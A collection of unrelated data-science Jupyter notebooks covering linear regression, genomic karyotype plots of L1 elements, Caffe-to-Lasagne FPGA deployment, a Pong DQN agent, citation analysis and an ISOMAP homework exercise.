import simplejson as json
print(json.dumps(req, indent=2))
# Ótimo! Dados foram recuperados!
#
# Agora podemos realizar a contagem das reações de um determinado post.
tipos_reacoes = ['LIKE','LOVE', 'WOW', 'HAHA', 'SAD', 'ANGRY']
dados = req['reactions']['data']
contagem = dict(zip(tipos_reacoes, [0,0,0,0,0,0]))
for reacao in dados:
contagem[reacao['type']] += 1
contagem
| Python/2016-08-08/aula7-parte1-reacoes.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# +
# linear_regression.m.
# <NAME>
#
import matplotlib.pyplot as plt
import numpy as np
import numpy.linalg as lin
import matplotlib.patches as mpatches
#Dataset: brainhead.txt
#Source: <NAME> (1905). "A Study of the Relations of the Brain to
#to the Size of the Head", Biometrika, Vol. 4, pp105-123
#Description: Brain weight (grams) and head size (cubic cm) for 237
#adults
#Variables
#First column Head size (cm^3)
#Second column Brain weight (grams)
br=np.loadtxt("brainhead.txt")
br_x=br[:,0] # x independent variable/experimental variable/predictor variable, (head size )
br_y=br[:,1] # y dependent variable/outcome variable (Brain weight )
n=np.size(br_y) # data size
plt.plot(br_x,br_y,'bd') # Plot the data; marker 'bd' =blue diamonds
plt.title ('Data from R.J.Gladstone study, 1905')
plt.xlabel('Head size, cm^3'); # Set the x-axis label
plt.ylabel('Brain weight (grams) '); # Set the y-axis label
plt.show() #hold on retains the current plot and certain
# +
import numpy as np
#Now, we want to allow a non-zero intercept for our linear equation.
#That is, we don't want to require that our fitted equation go through the origin.
#In order to do this, we need to add a column of all ones to our x column.#
# To make sure that regression line does not go through origin
# add a column of all ones (intercept term) to x
# BR_X = [ones(n, 1) br_x];
BR_X = np.vstack([br_x, np.ones(len(br_x))]).T
# and compare the results.
# Given a matrix equation
# X * theta=y,
# the normal equation is that which minimizes the sum of the square differences
# between the left and right sides:
# X'*X*theta=X'*y.
# It is called a normal equation because y-X*theta is normal to the range of X.
# Here, X'*X is a normal matrix.
# Putting that into Octave:
# Calculate theta
# theta = (pinv(X'*X))*X'*y
# Or simply use backward slice operator
theta = lin.lstsq(BR_X,br_y)[0]
#minimize norm(X*theta-y) via a QR factorization
# we can also use the equivalent command
# theta=mldivide(X,y)
# You should get theta = [ 325.57342 0.26343].
# This means that our fitted equation is as follows:
# y = 0.26343x + 325.57342.
theta1= np.ones(len(BR_X))
theta1= theta1*theta[1]
br_y_est=np.add(BR_X[:,0]*theta[0],theta1) ;
# Now, let's plot our fitted equation (prediction) on top
# of the training data, to see if our fitted equation makes
# sense.
# Plot the fitted equation we got from the regression
#tr_plot=plt.plot(br_x,br_y,'rd',label='Training data')
#lin_reg= plt.plot(br_x,br_y_est,'b-', label='Linear Regression') # Plot the data; marker 'bd' =blue diamonds
plt.plot(br_x,br_y,'bd',br_x,br_y_est,'r-')
plt.title ('Data from R.J.Gladstone study, 1905')
plt.xlabel('Head size, cm^3'); # Set the x-axis label
plt.ylabel('Brain weight (grams) '); # Set the y-axis label
plt.legend(('Training data','Linear regression'),loc='upper left')
plt.show() #hold on retains the current plot and certain
print ("hello")
# +
# Evaluate each fit you make in the context of your data. For example,
# if your goal of fitting the data is to extract coefficients that have
# physical meaning, then it is important that your model reflect the
# physics of the data. Understanding what your data represents,
# how it was measured, and how it is modeled is important when evaluating
# the goodness of fit.
# One measure of goodness of fit is the coefficient of determination,
# or R^2 (pronounced r-square). This statistic indicates how closely
# values you obtain from fitting a model match the dependent variable
# the model is intended to predict. Statisticians often define R^2
# using the residual variance from a fitted model:
# R^2 = 1 – SSresid / SStotal
# SSresid is the sum of the squared residuals from the regression.
# SStotal is the sum of the squared differences from the mean
# of the dependent variable (total sum of squares). Both are positive scalars.
# Residuals are the difference between the observed values of the response (dependent)
# variable and the values that a model predicts. When you fit a model that is
# appropriate for your data, the residuals approximate independent random errors.
# That is, the distribution of residuals ought not to exhibit a discernible pattern.
# Producing a fit using a linear model requires minimizing the sum of the squares
# of the residuals. This minimization yields what is called a least-squares fit.
# You can gain insight into the "goodness" of a fit by visually examining a plot
# of the residuals. If the residual plot has a pattern (that is, residual data
# points do not appear to have a random scatter), the randomness indicates
# that the model does not properly fit the data.
# The higher the value of R-square , the better the model is at predicting the data.
# Say if Rsq is 0.7, we can say that 70% of the variation in dependent
# variable is explained by the independent variable.
residuals=br_y-br_y_est
Rsq = 1 - sum(residuals**2)/sum((br_y - np.mean(br_y))**2)
# -
# also examine mean and standard deviation of residuals.
mean_residuals=np.mean(residuals)
std_residuals=np.std(residuals)
# +
x_range= range(0,n)
ref=np.ones(n)
plt.plot(x_range,residuals,'bo',x_range,ref,'r-')
plt.xlabel('data index')
plt.ylabel('residuals')
plt.legend(('residuals','zero line'), loc='upper right')
plt.show()
# -
| ML_Notebook/Linear Regression/.ipynb_checkpoints/linear_regression-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:rbruce]
# language: python
# name: conda-env-rbruce-py
# ---
# ## Karyotype plots of all L1s by datasets + Correlation analysis of element # and chr size
# ### 1. Karyotype Plots
##Karyotype plot of L1s
# !cd ~/Google_Drive/L1/L1_Project/Analysis/Karyotype_plots/
# %load_ext rpy2.ipython
# + language="R"
# library("rtracklayer")
# library(karyoploteR)
# library(GenomicRanges)
# + language="R"
# #Load the data
# #L1_denovo<-read.table("L1denovo_BWA_merged4_undecidable_100kb_no_gaps_no_blacklisted.interval",sep="\t")[,1:3]
# L1_denovo<-read.table("L1denovo_BWA_17037_for_karyotype.bed",sep="\t")[,1:3]
# names(L1_denovo)=c('chr','start','end')
# #class(G137_Br)
# #head(G137_Br)
# ## Karyotype plot with "karyoploteR",
# gains <- makeGRangesFromDataFrame(L1_denovo) ## Import target positions
# #head(gains)
# length(gains)
# -
# !tail L1denovo_BWA_17037_for_karyotype.bed
# + language="R"
# ## Plot de novo
# pdf('L1_denovo.pdf',width=15, height=13)
# pp <- getDefaultPlotParams(plot.type=1)
# pp$leftmargin <- 0.1
# pp$data1height <- 80
# kp<-plotKaryotype(genome="hg19", main="de novo L1s",plot.type=1, plot.params = pp) ## Set genome assembly
# #kpPlotRegions(kp, gains,col="red",avoid.overlapping=FALSE ) ## Choose color
# #getCytobandColors(color.table=NULL, color.schema=c("only.centromeres"))
# kpPlotRegions(kp, gains,col="red") ## Choose color
# kpAddCytobandLabels(kp,cex=0.5)
# dev.off()
# + language="R"
# #Load the data
# #L1_pol<-read.table("L1_Pol_clean.bed",sep="\t")[,1:3]
# L1_pol<-read.table("PolyL1_Ewing_LiftOver_18to19_1012_for_karyotype.bed",sep="\t")[,1:3]
# names(L1_pol)=c('chr','start','end')
# #class(G137_Br)
# #head(G137_Br)
# ## Karyotype plot with "karyoploteR",
# gains <- makeGRangesFromDataFrame(L1_pol) ## Import target positions
# #head(gains)
# length(gains)
# + language="R"
# ## Plot L1 pol
# pdf('L1_pol.pdf',width=15, height=13)
# pp <- getDefaultPlotParams(plot.type=1)
# pp$leftmargin <- 0.1
# pp$data1height <- 80
# kp<-plotKaryotype(genome="hg19", main="Polymorphic L1s",plot.type=1, plot.params = pp) ## Set genome assembly
# #kpPlotRegions(kp, gains,col="red",avoid.overlapping=FALSE ) ## Choose color
# getCytobandColors(color.table=NULL, color.schema=c("only.centromeres"))
# kpPlotRegions(kp, gains,col="blue") ## Choose color
# kpAddCytobandLabels(kp,cex=0.5)
# dev.off()
# + language="R"
# #Load the data
# #L1_hs<-read.table("L1HS_UCSC.bed",sep="\t")[,1:3]
# L1_hs<-read.table("L1HS_clean_sorted_1205.bed",sep="\t")[,1:3]
# names(L1_hs)=c('chr','start','end')
# #class(G137_Br)
# #head(G137_Br)
# ## Karyotype plot with "karyoploteR",
# gains <- makeGRangesFromDataFrame(L1_hs) ## Import target positions
# #head(gains)
# length(gains)
# + language="R"
# ## Plot L1 hs
# pdf('L1_hs.pdf',width=15, height=13)
# pp <- getDefaultPlotParams(plot.type=1)
# pp$leftmargin <- 0.1
# pp$data1height <- 80
# kp<-plotKaryotype(genome="hg19", main="Human-specific L1s",plot.type=1, plot.params = pp) ## Set genome assembly
# #kpPlotRegions(kp, gains,col="red",avoid.overlapping=FALSE ) ## Choose color
# getCytobandColors(color.table=NULL, color.schema=c("only.centromeres"))
# kpPlotRegions(kp, gains,col="green") ## Choose color
# kpAddCytobandLabels(kp,cex=0.5)
# dev.off()
# + language="R"
# #Overlay all L1s in the same karyotype plot
# pdf('L1_ALL.pdf',width=15, height=13)
# pp <- getDefaultPlotParams(plot.type=1)
# pp$leftmargin <- 0.1
# pp$data1height <- 60
# kp<-plotKaryotype(genome="hg19", main="Genome-wide distribution of all L1s in the study",plot.type=1, plot.params = pp, cex=1.6) ## Set genome assembly
# #kpPlotRegions(kp, gains,col="red",avoid.overlapping=FALSE ) ## Choose color
# getCytobandColors(color.table=NULL, color.schema=c("only.centromeres"))
# kpPlotRegions(kp, r0 = 0, r1 = 2,gains_denovo,col="red") ## Choose color
# kpPlotRegions(kp, r0 = 0, r1 = 0.8,gains_pol, col="blue") ## Choose color
# kpPlotRegions(kp, r0 = 0, r1 = 0.8,gains_hs, col="green") ## Choose color
# kpAddCytobandLabels(kp,cex=0.8)
# dev.off()
# -
# ### 2. Correlation analysis: Number of elements vs. Chr size
#
## Get chromosome size (hg19) from UCSC
# #!wget http://hgdownload.cse.ucsc.edu/goldenPath/hg19/bigZips/hg19.chrom.sizes
# !head hg19.chrom.sizes
# + language="R"
# ## Read chr size into R, sort and remove chr Y/unknown
# chrom_size<-read.table('hg19.chrom.sizes', header=FALSE, sep='\t')[1:24,]
# colnames(chrom_size)=c('chr','size')
# chrom_size_sorted <- chrom_size[order(chrom_size$chr),]
# #head(chrom_size_sorted,24)
# chrom_size_sorted_clean <- chrom_size_sorted[1:23,]
# head(chrom_size_sorted_clean)
#
# -
# ### de novo L1
# + language="R"
# ## Read l1hs and calculate element count per chr
# l1denovo<-read.table('L1denovo_BWA_17037_for_karyotype.bed', header=FALSE, sep='\t')[,1]
# l1denovo_count <- as.data.frame(table(l1denovo))
# colnames(l1denovo_count)=c('chr','count')
# head(l1denovo_count)
# + language="R"
# l1denovo_size_count <- merge(chrom_size_sorted_clean,l1denovo_count,by="chr")
# l1denovo_size_count
# + language="R"
# fit1<-lm(count~size,data=l1denovo_size_count)
# #cor(l1denovo_size_count[,2],l1denovo_size_count[,3])
# summary(fit1)$r.squared
# + language="R"
# require(ggplot2)
# + language="R"
# #pdf(file='denovoL1_vs_chrsize.pdf')
#
# ##Plot chr size against element (regression line with 95% CI)
# ggplot(l1denovo_size_count, aes(size,count)) + geom_point(colour='red') +
# geom_smooth(method=lm,colour='red') + geom_text(size=2.9,aes(label=chr),hjust=0, vjust=1)+
# theme(legend.position = "none") +
# theme(plot.margin = margin(8,8,8,8)) +
# xlab("Chromosome Size") + ylab("Count of Elements") + theme(plot.title = element_text(hjust = 0.5)) + ggtitle("Count of de novo L1s by Chromosome Size \n(R-squared=0.59)")
#
# #ggsave("denovoL1_vs_chrsize.pdf")
#
# -
# ### Polymorphic L1s
# + language="R"
# ## Read l1hs and calculate element count per chr
# l1pol<-read.table('PolyL1_Ewing_LiftOver_18to19_1012_for_karyotype.bed', header=FALSE, sep='\t')[,1]
# #length(l1pol)
# l1pol_count <- as.data.frame(table(l1pol))
# colnames(l1pol_count)=c('chr','count')
# head(l1pol_count)
# + language="R"
# l1pol_size_count <- merge(chrom_size_sorted_clean,l1pol_count,by="chr")
# l1pol_size_count
# + language="R"
# #cor(l1pol_size_count[,2],l1pol_size_count[,3])
# fit2<-lm(count~size,data=l1pol_size_count)
# summary(fit2)$r.squared
# + language="R"
# ##Plot chr size against element (regression line with 95% CI)
# require(ggplot2)
# ggplot(l1pol_size_count, aes(size,count)) + geom_point(colour='blue') +
# geom_smooth(method=lm,colour='blue') + geom_text(size=2.9,aes(label=chr),hjust=0, vjust=1)+
# theme(legend.position = "none") +
# theme(plot.margin = margin(8,8,8,8)) +
# xlab("Chromosome Size") + ylab("Count of Elements") +
# theme(plot.title = element_text(hjust = 0.5)) +
# ggtitle("Count of Polymorphic L1s by Chromosome Size \n(R-squared=0.86)")
#
# #ggsave("polymorphicL1_vs_chrsize.pdf")
#
# -
# ### L1HS
# + language="R"
# ## Read l1hs and calculate element count per chr
# l1hs<-read.table('L1HS_clean_sorted_1205.bed', header=FALSE, sep='\t')[,1]
# #colnames(l1hs)=c('chr')
# #head(l1hs)
# l1hs_count <- as.data.frame(table(l1hs))
# colnames(l1hs_count)=c('chr','count')
# head(l1hs_count)
# + language="R"
# l1hs_size_count <- merge(chrom_size_sorted_clean,l1hs_count,by="chr")
# l1hs_size_count
# + language="R"
# #cor(l1hs_size_count[,2],l1hs_size_count[,3])
# fit3<-lm(count~size,data=l1hs_size_count)
# summary(fit3)$r.squared
# + language="R"
# ##Plot chr size against element (regression line with 95% CI)
# #attach(l1hs_size_count)
# #plot(size~count, lab=chr)
# require(ggplot2)
# ggplot(l1hs_size_count, aes(size,count)) + geom_point(colour='green') +
# geom_smooth(method=lm,colour='green') + geom_text(size=2.9,aes(label=chr),hjust=0, vjust=1)+
# theme(legend.position = "none") +
# theme(plot.margin = margin(8,8,8,8)) +
# xlab("Chromosome Size") + ylab("Count of Elements") +
# theme(plot.title = element_text(hjust = 0.5)) +
# ggtitle("Count of Human-specific L1s by Chromosome Size \n(R-squared=0.75)")
#
# #ggsave("L1HS_vs_chrsize.pdf")
#
| Analysis/Karyotype_plots/L1s_Karyotype_SizeCorrelation.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Introduction
#
# This example demonstrates how to convert a network from [Caffe's Model Zoo](https://github.com/BVLC/caffe/wiki/Model-Zoo) for use with Lasagne. We will be using the Caffe version of CIFAR-10 Model.
#
# We will create a set of Lasagne layers corresponding to the Caffe model specification (prototxt), then copy the parameters from the caffemodel file into our model.
# # Converting from Caffe to Lasagne
# ### Download the required files
#
# First we download `cifar10_nin.caffemodel` and `model.prototxt`. The supplied `train_val.prototxt` was modified to replace the data layers with an input specification, and remove the unneeded loss/accuracy layers.
# ### Import Caffe
#
# To load the saved parameters, we'll need to have Caffe's Python bindings installed.
import sys
caffe_root = '/home/xilinx/caffe/' # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
import caffe
# ### Load the pretrained Caffe network
net_caffe = caffe.Net('CIFAR_10.prototxt', 'cifar10_quick_iter_5000.caffemodel.h5', caffe.TEST)
# ### Import Lasagne
import lasagne
from lasagne.layers import InputLayer, DropoutLayer, DenseLayer, NonlinearityLayer
#from lasagne.layers.dnn import Conv2DDNNLayer as ConvLayer
from lasagne.layers import Conv2DLayer as ConvLayer
from lasagne.layers import Pool2DLayer as PoolLayer
from lasagne.nonlinearities import softmax, rectify, linear
import conv_fpga
from conv_fpga import FPGA_CIFAR10
from conv_fpga import FPGAQuickTest
#from conv_fpga import Conv2DLayer as ConvLayer
from conv_fpga import FPGAWeightLoader as FPGALoadW
from lasagne.utils import floatX
# ### Create a Lasagne network
# Layer names match those in `model.prototxt`
net = {}
net['input'] = InputLayer((None, 3, 32, 32))
net['conv1'] = ConvLayer(net['input'], num_filters=32, filter_size=5, pad=2, nonlinearity=None)
net['pool1'] = PoolLayer(net['conv1'], pool_size=2, stride=2, mode='max', ignore_border=False)
net['relu1'] = NonlinearityLayer(net['pool1'], rectify)
net['conv2'] = ConvLayer(net['relu1'], num_filters=32, filter_size=5, pad=2, nonlinearity=rectify)
net['pool2'] = PoolLayer(net['conv2'], pool_size=2, stride=2, mode='average_exc_pad', ignore_border=False)
net['conv3'] = ConvLayer(net['pool2'], num_filters=64, filter_size=5, pad=2, nonlinearity=rectify)
net['pool3'] = PoolLayer(net['conv3'], pool_size=2, stride=2, mode='average_exc_pad', ignore_border=False)
net['ip1'] = DenseLayer(net['pool3'], num_units=64, nonlinearity = None)
net['ip2'] = DenseLayer(net['ip1'], num_units=10, nonlinearity = None)
net['prob'] = NonlinearityLayer(net['ip2'], softmax)
# ### Copy the parameters from Caffe to Lasagne
# +
import numpy as np
layers_caffe = dict(zip(list(net_caffe._layer_names), net_caffe.layers))
for name, layer in net.items():
try:
# layer.W.set_value(layers_caffe[name].blobs[0].data)
# layer.b.set_value(layers_caffe[name].blobs[1].data)
if name=='ip1'or name=='ip2':
layer.W.set_value(np.transpose(layers_caffe[name].blobs[0].data))
layer.b.set_value(layers_caffe[name].blobs[1].data)
# print((layers_caffe[name].blobs[0].data.shape))
# print(np.amax(layers_caffe[name].blobs[0].data))
# print(np.amin(layers_caffe[name].blobs[0].data))
else:
layer.W.set_value(layers_caffe[name].blobs[0].data[:,:,::-1,::-1])
layer.b.set_value(layers_caffe[name].blobs[1].data)
# print((layers_caffe[name].blobs[0].data.shape))
# print(np.amax(layers_caffe[name].blobs[0].data))
# print(np.amin(layers_caffe[name].blobs[0].data))
except AttributeError:
continue
# -
# ### Copy the parameters from CPU to FPGA OnChip Memory
#FPGALoadW(weight, status, IFDim, OFDim, PadDim)
weight = net['conv1'].W.get_value()
FPGALoadW(weight, 1, 32, 32, 2)
weight = net['conv2'].W.get_value()
FPGALoadW(weight, 2, 16, 16, 2)
weight = net['conv3'].W.get_value()
FPGALoadW(weight, 3, 8, 8, 2)
weight = net['ip1'].W.get_value()
weight = np.transpose(weight)
weight = weight.reshape(64, 64, 4, 4)
FPGALoadW(weight, 4, 4, 1, 0, flip_filters=False)
weight = net['ip2'].W.get_value()
weight = np.transpose(weight)
weight = weight.reshape(10, 64, 1, 1)
FPGALoadW(weight, 5, 1, 1, 0, flip_filters=False)
# # Trying it out
# Let's see if that worked.
#
# ### Import numpy and set up plotting
# ### Import time
# +
import gzip
import _pickle as cPickle
import matplotlib.pyplot as plt
import time
# %matplotlib inline
# -
# ### Download some test data
# Load CIFAR_10 test data.
data = np.load('cifar10.npz')
mean_image = np.load('mean_image.npy')
data_zeromean = data['raw'] - mean_image
# print(np.shape(data['whitened'][0:1]))
# print(np.amax(data['raw'][0:1]))
# print(np.amin(data['raw'][0:1]))
##
def make_image(X):
im = np.swapaxes(X.T, 0, 1)
im = im - im.min()
im = im * 1.0 / im.max()
return im
plt.figure(figsize=(5, 5))
plt.imshow(make_image(data['raw'][0]), interpolation='nearest')
# ### FPGA Deployment (CIFAR10 Layer)
FPGA_net = {}
FPGA_net['input'] = InputLayer((None, 3, 32, 32))
FPGA_net['cifar10'] = FPGA_CIFAR10(FPGA_net['input'])
FPGA_net['prob'] = NonlinearityLayer(FPGA_net['cifar10'], softmax)
# +
batch_size = 500
# %time prob = lasagne.layers.get_output(FPGA_net['cifar10'], floatX(data_zeromean[0:batch_size]), deterministic=True)#.eval()
FPGA_predicted = np.argmax(prob, 1)
# -
FPGA_accuracy = np.mean(FPGA_predicted == data['labels'][0:batch_size])
print(FPGA_predicted)
print(data['labels'][0:batch_size])
print(FPGA_accuracy)
# ### FPGA Deployment (QuickTest Function)
# +
batch_size = 2
OFMDim = 1
OFMCH = 10
# %time FPGA_output = FPGAQuickTest(data_zeromean*0.85, batch_size, OFMDim, OFMCH)
FPGA_predicted = np.argmax(FPGA_output.reshape(batch_size, -1), 1)
#np.save('FPGA_output', FPGA_output)
# -
FPGA_accuracy = np.mean(FPGA_predicted == data['labels'][0:batch_size])
print(FPGA_accuracy)
# ### Testbench: Check output for each layer
conv_output = lasagne.layers.get_output(net['ip2'], floatX(data['raw'][0:1]), deterministic=True).eval()
print('upper bound', np.amax(conv_output))
print('lower bound', np.amin(conv_output))
print(conv_output.shape)
print(conv_output)
# np.allclose(FPGA_output, conv_output)
# np.save('cpu_output', conv_output)
A = np.load('FPGA_output.npy')
B = np.load('cpu_output.npy')
print('A',A[4])
print('B',B[4])
np.allclose(A,B)
#print(np.amax(B))
# +
## Testbench for a single conv layer
net1 = {}
net1['input_1'] = InputLayer((None, 1, 28, 28))
net1['conv_1'] = ConvLayer(net1['input_1'], num_filters=20, filter_size=5, pad=0, nonlinearity=linear)
weight = np.random.rand(20, 1, 5, 5)*2-1
#weight = weight[...,::-1,::-1]
print('weight shape',weight.shape)
net1['conv_1'].W.set_value(weight)
input = np.random.rand(1, 1, 28, 28)
print('input shape',input.shape)
conv_output_test = lasagne.layers.get_output(net1['conv_1'], floatX(input), deterministic=True).eval()
print(conv_output_test)
print('max', np.amax(conv_output_test))
print('min', np.amin(conv_output_test))
print('##############################')
FPGALoadW(weight, 1, 28, 24, 0)
FPGA_output = FPGAQuickTest(input, 1, 24, 20)
print(FPGA_output)
print('max', np.amax(FPGA_output))
print('min', np.amin(FPGA_output))
np.allclose(conv_output_test, FPGA_output)
# +
## Testbench for a single ip layer
net2 = {}
net2['input_2'] = InputLayer((None, 50, 4, 4))
net2['ip_2'] = DenseLayer(net2['input_2'], num_units=500, nonlinearity=rectify)
weight = np.random.rand(800,500)*2-1
#weight = np.arange(32)/32
#weight = weight.reshape(8,4)
#print('weight (caffe)',weight)
net2['ip_2'].W.set_value(weight)
input = np.random.rand(1, 50, 4, 4)
#input = np.arange(8)/8
#input = input.reshape(1,2,2,2)
#print('input (caffe)',input)
conv_output_test = lasagne.layers.get_output(net2['ip_2'], floatX(input), deterministic=True).eval()
print(conv_output_test)
print('max', np.amax(conv_output_test))
print('min', np.amin(conv_output_test))
print('##############################')
weight = np.transpose(weight)
weight = weight.reshape(500, 50, 4, 4)
#print('weight (fpga)',weight)
#weight = weight[...,::-1,::-1]
FPGALoadW(weight, 3, 4, 1, 0, flip_filters=False)
#print('input (fpga)',input)
FPGA_output = FPGAQuickTest(input, 1, 1, 500)
print(FPGA_output.reshape(1,500))
print('max', np.amax(FPGA_output))
print('min', np.amin(FPGA_output))
np.allclose(conv_output_test, FPGA_output)
# -
# ### Make predictions on the test data
start_time = time.process_time()
prob = np.array(lasagne.layers.get_output(net['prob'], floatX(data_zeromean[0:500]), deterministic=True).eval())
predicted = np.argmax(prob, 1)
end_time = time.process_time()
print("Elapsed Test Time: ", end_time-start_time)
# ### Check our accuracy
# We expect around 75%
accuracy = np.mean(predicted == data['labels'][0:500])
print(predicted)
print(data['labels'][0:500])
print(accuracy)
# +
wrong = predicted != test_label[0][5000:10000]
wrong_ind = [i for i,x in enumerate(wrong) if x == 1]
print(wrong_ind)
def make_image(X):
im = np.swapaxes(X.T, 0, 1)
im = im - im.min()
im = im * 1.0 / im.max()
return im
plt.figure(figsize=(16, 5))
for i in range(0, 10):
plt.subplot(1, 10, i+1)
plt.imshow(make_image(test_data[wrong_ind[i]+5000][0]), interpolation='nearest', cmap=plt.get_cmap('gray'))
true = test_label[0][wrong_ind[i]+5000]
pred = predicted[wrong_ind[i]]
color = 'green' if true == pred else 'red'
plt.text(0, 0, true, color='black', bbox=dict(facecolor='white', alpha=1))
plt.text(0, 32, pred, color=color, bbox=dict(facecolor='white', alpha=1))
plt.axis('off')
# -
# ### Double check
# Let's compare predictions against Caffe
net_caffe.blobs['data'].reshape(500, 3, 32, 32)
net_caffe.blobs['data'].data[:] = data['raw'][0:500]
prob_caffe = net_caffe.forward()['prob']#[:,:,0,0]
np.allclose(prob, prob_caffe)
# print(prob)
# print(prob_caffe)
# ### Graph some images and predictions
# +
def make_image(X):
im = np.swapaxes(X.T, 0, 1)
im = im - im.min()
im = im * 1.0 / im.max()
return im
plt.figure(figsize=(16, 5))
for i in range(0, 10):
plt.subplot(1, 10, i+1)
plt.imshow(make_image(test_data[i][0]), interpolation='nearest', cmap=plt.get_cmap('gray'))
true = test_label[0][i]
pred = FPGA_predicted[i]
color = 'green' if true == pred else 'red'
plt.text(0, 0, true, color='black', bbox=dict(facecolor='white', alpha=1))
plt.text(0, 32, pred, color=color, bbox=dict(facecolor='white', alpha=1))
plt.axis('off')
# -
# ### Save our model
# Let's save the weights in pickle format, so we don't need Caffe next time
# +
import pickle
values = lasagne.layers.get_all_param_values(net['output'])
pickle.dump(values, open('model.pkl', 'w'))
| python_notebooks/Theano/CIFAR_10/.ipynb_checkpoints/Using a Caffe Pretrained Network - CIFAR10-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Analysis: Citations by year
# +
import pandas as pd
from techminer import RecordsDataFrame
rdf = RecordsDataFrame(pd.read_json("step-07.json", orient="records", lines=True))
# -
rdf.citations_by_year()
rdf.citations_by_year().barhplot()
rdf.citations_by_year().barhplot("altair")
rdf.citations_by_year(cumulative=True).barhplot("altair")
rdf.documents_by_terms("Cited by")
rdf.documents_by_terms("Cited by").print_IDs()
| guide/tutorial/17-citations-by-year.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import gym
import numpy as np
from collections import deque
from keras.models import Sequential
from keras.layers import Dense, Conv2D, MaxPooling2D, Flatten
from keras.optimizers import Adam
import matplotlib.pyplot as plt
# %matplotlib inline
# -
env = gym.make('Pong-v0')
# +
EPISODES = 300
GAMMA = 0.99
EXPLORE_INIT = 1.0
EXPLORE_FINAL = 0.01
MEMORY_SIZE = 17500
MEMORT_START_SIZE = 7500
BATCH_SIZE = 4
ACTION_SIZE = env.action_space.n
# -
# Remove outer game area and normalize to 0-1
def preprocess(image):
image = image / 255
image = image[34:194:3,0:160:3,0:3]
return image
def create_Q_model(learning_rate=0.001):
model = Sequential()
model.add(Conv2D(16, (3,3), padding='same', activation='relu', input_shape=(54, 54, 3)))
model.add(MaxPooling2D())
model.add(Conv2D(24, (3,3), padding='same', activation='relu'))
model.add(MaxPooling2D())
model.add(Conv2D(32, (3,3), padding='same', activation='relu'))
model.add(MaxPooling2D())
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dense(128, activation='relu'))
model.add(Dense(ACTION_SIZE, activation='linear'))
optimizer = Adam(lr=learning_rate)
model.compile(loss='mse', optimizer=optimizer)
return model
class Memory():
def __init__(self, max_size):
self.buffer = deque(maxlen=max_size)
def add(self, experience):
self.buffer.append(experience)
def size(self):
return len(self.buffer)
def sample(self, batch_size):
idx = np.random.choice(
np.arange(len(self.buffer)),
size=batch_size,
replace=False
)
return [self.buffer[ii] for ii in idx]
model = create_Q_model()
memory = Memory(max_size = MEMORY_SIZE)
f = open("log.txt", "w")
# +
explore_rate = EXPLORE_INIT
frame = 0
for ep in range(0, EPISODES):
env.reset()
state, reward, done, _ = env.step(env.action_space.sample())
state = preprocess(state)
state= np.expand_dims(state, axis=0)
frame += 1
total_reward = 0
explore_rate = EXPLORE_INIT - (EXPLORE_INIT - EXPLORE_FINAL) * (ep + 1) / EPISODES
while True:
if np.random.rand() > explore_rate:
action = np.argmax(model.predict(state)[0])
else:
action = env.action_space.sample()
next_state, reward, done, _ = env.step(env.action_space.sample())
next_state = preprocess(next_state)
next_state = np.expand_dims(next_state, axis=0)
frame += 1
state = next_state
# env.render()
total_reward += reward
memory.add((state, action, reward, done, next_state))
if memory.size() >= MEMORT_START_SIZE:
minibatch = memory.sample(BATCH_SIZE)
inputs = np.zeros((BATCH_SIZE, 54, 54, 3))
targets = np.zeros((BATCH_SIZE, ACTION_SIZE))
for i, (state_b, action_b, reward_b, done_b, next_state_b) in enumerate(minibatch):
inputs[i:i+1] = state_b[0]
if done_b:
target = reward_b
else:
target = reward_b + GAMMA * np.amax(model.predict(next_state_b))
targets[i] = model.predict(next_state_b)[0]
targets[i][action_b] = target
model.fit(inputs, targets, epochs=1, verbose=0)
if done:
log_message = "Episode {}, Total Reward {}, Explore Rate {}".format(ep + 1, total_reward, explore_rate)
f.write(log_message + "\n")
f.flush()
print(log_message)
break
if ep % 5 == 0:
model.save('model.h5')
f.close()
# -
print("!")
| pong-dqn.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## CSCI-UA 9473 Final Assignment
#
# ## <NAME>
# ### Part II. Unsupervised Learning (20pts)
# ### Exercise II.1. Clustering and latent representation
#
# The lines below can be used to load and display (low resolution) images of digits from 0 to 9. The labels associated to each image are stored in the vector $y$. From this vector, only retain the images representing $4$ and $3$. We will temporarily forget about the labels for now and learn a 2D representation of the images through ISOMAP.
# ### Import Libraries
from __future__ import division
from sklearn import datasets
import matplotlib.pyplot as plt
import numpy as np
from sklearn.metrics import pairwise_distances
from sklearn.metrics import pairwise_distances_argmin
from copy import copy, deepcopy
from numpy import linalg as LA
from sklearn.manifold import MDS
from scipy import linalg
# +
digits = datasets.load_digits(n_class=10)
X = digits.data
y = digits.target
plt.figure()
plt.imshow(np.reshape(X[0,:], (8,8)),cmap='gray',alpha=1)
plt.show()
# -
# # Question II.1.1 Building the graph (5pts)
#
# We will start by building the graph representing the data. For this, we will follow the steps below
#
#
# __1.__ Center the dataset as $\mathbf{x}_i \leftarrow \mathbf{x}_i - \mathbb{E}_i\mathbf{x}_i$
#
# __2.__ Compute the matrix of pairwise distances between the centered images. You can do this either by hand, noting that $D(\mathbf{x}_i, \mathbf{x}_j) = \|\mathbf{x}_i\|^2 + \|\mathbf{x}_j\|^2 - 2\langle \mathbf{x}_i, \mathbf{x}_j\rangle$ or using a call to the 'pairwise_distances' function from scikit learn.
#
